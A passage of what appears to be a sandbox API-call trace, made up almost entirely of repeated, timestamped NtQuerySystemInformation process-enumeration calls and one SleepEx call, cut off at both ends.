SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.179] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.180] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.206] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.207] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.208] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.213] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.219] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.221] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.237] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.243] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.246] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.259] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.260] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.263] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.267] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.275] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.286] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.286] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.317] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.317] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.317] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0070.324] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0073.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.023] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.023] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.024] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.024] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.026] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.026] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.034] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0xdd78) returned 0x0 [0073.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: 